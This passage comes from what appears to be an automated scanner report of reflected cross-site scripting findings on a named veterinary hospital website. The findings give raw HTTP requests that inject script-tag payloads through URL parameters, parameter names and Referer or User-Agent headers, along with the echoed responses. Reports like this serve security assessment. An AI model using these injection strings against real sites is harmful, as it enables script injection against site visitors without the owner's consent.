NET%2bCLR%2b1.1.4322)64c08"><script>alert(1)</script>fa2f4234571&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:48:28 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=42ioijmo61q4lhnolf0g547n70; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
dows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)64c08"><script>alert(1)</script>fa2f4234571&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)" />
...[SNIP]...

2.120. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [useragent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the useragent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc9a7"><script>alert(1)</script>a58880500cd was submitted in the useragent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)fc9a7"><script>alert(1)</script>a58880500cd HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:48:33 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=njd61do981s3a37nqrprgfios7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)fc9a7"><script>alert(1)</script>a58880500cd" />
...[SNIP]...

2.121. http://www.vcahospitals.com/plymouth/appt.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /plymouth/appt.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbd10"><a>af94765ca4d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /plymouth/appt.htmlfbd10"><a>af94765ca4d HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:47:20 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Type: text/html
Content-Length: 9907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<body id="apptfbd10"><a>af94765ca4d">
...[SNIP]...

2.122. http://www.vcahospitals.com/plymouth/appt.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /plymouth/appt.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b638a"><script>alert(1)</script>3e858d70063 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /plymouth/appt.html?b638a"><script>alert(1)</script>3e858d70063=1 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:53 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 22006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/plymouth/appt.html?b638a"><script>alert(1)</script>3e858d70063=1" />
...[SNIP]...

2.123. http://www.vcahospitals.com/plymouth/more/boarding.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /plymouth/more/boarding.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 657cd"><a>2035dd31204 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /plymouth/more657cd"><a>2035dd31204/boarding.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/plymouth/appt.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.22.10.1299326665

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:47:36 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Type: text/html
Content-Length: 9907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<body id="more657cd"><a>2035dd31204">
...[SNIP]...

2.124. http://www.vcahospitals.com/hanson/appt.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/appt.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a275f"><script>alert(1)</script>50189f95eed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /hanson/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=a275f"><script>alert(1)</script>50189f95eed
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:32 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 20916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="http://www.google.com/search?hl=en&q=a275f"><script>alert(1)</script>50189f95eed" />
...[SNIP]...

2.125. http://www.vcahospitals.com/hanson/appt.html [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/appt.html

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1aeba"><script>alert(1)</script>f4116ac98b0 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /hanson/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/hanson
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.131aeba"><script>alert(1)</script>f4116ac98b0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:28 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 20913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.131aeba"><script>alert(1)</script>f4116ac98b0" />
...[SNIP]...

2.126. http://www.vcahospitals.com/main/offer [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57e77"><script>alert(1)</script>8105a26b689 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=57e77"><script>alert(1)</script>8105a26b689

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:05:06 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=qur1s877iqte90hbj289vogdv5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="http://www.google.com/search?hl=en&q=57e77"><script>alert(1)</script>8105a26b689" />
...[SNIP]...

2.127. http://www.vcahospitals.com/main/offer [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93282"><script>alert(1)</script>5b7938f8052 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.1393282"><script>alert(1)</script>5b7938f8052
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:05:02 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=psqbs3kc8ulu01cr19pld79dp0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10784

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.1393282"><script>alert(1)</script>5b7938f8052" />
...[SNIP]...

2.128. http://www.vcahospitals.com/main/offer/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9378"><script>alert(1)</script>0a72e423827 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /main/offer/?&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.google.com/search?hl=en&q=d9378"><script>alert(1)</script>0a72e423827
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:38 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14608

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="http://www.google.com/search?hl=en&q=d9378"><script>alert(1)</script>0a72e423827" />
...[SNIP]...

2.129. http://www.vcahospitals.com/main/offer/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8614f"><script>alert(1)</script>cee15d78e68 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /main/offer/?&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)8614f"><script>alert(1)</script>cee15d78e68
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:31 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="useragent" id="useragent" value="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)8614f"><script>alert(1)</script>cee15d78e68" />
...[SNIP]...

2.130. http://www.vcahospitals.com/main/offer/thank-you.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/thank-you.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95362"><script>alert(1)</script>05c6e8d8221 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

POST /main/offer/thank-you.html? HTTP/1.1
Referer: http://www.google.com/search?hl=en&q=95362"><script>alert(1)</script>05c6e8d8221
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 448

fname=&lname=&addr=&city=&state&zip=&phone=&email=&optin=on&pettype&other=&petname=&petage=&variant=&submit=Get+FREE+Coupon&token=917e022cccb7f727295d2ccceeb0579c&guid=2505B0C6-B6AA-4144-878F-54873D35
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:24:55 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3534
Content-Type: text/html

